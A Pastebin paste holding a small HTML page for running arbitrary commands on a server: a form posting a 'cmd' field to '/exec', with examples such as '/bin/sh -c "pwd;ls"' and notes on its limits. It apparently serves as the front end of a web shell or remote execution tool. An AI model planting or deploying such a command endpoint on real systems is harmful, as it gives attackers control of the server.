Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <HTML><BODY><BR>
- Command : <FORM METHOD=POST ACTION="/exec"><INPUT NAME="cmd" TYPE=text SIZE=80 VALUE=""><INPUT TYPE=submit VALUE="Run"></FORM><BR>
- Examples: /bin/ls, /bin/sh -c "pwd;ls", cmd /c dir c:<BR>
- Note: full path has to be specified<BR>
- Note: cannot use 'prog1 | prog2', 'program > file' or 'program < file'<BR>
- Note: program must not expect keyboard presses (stdin) from user<BR>
- <HR><PRE>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement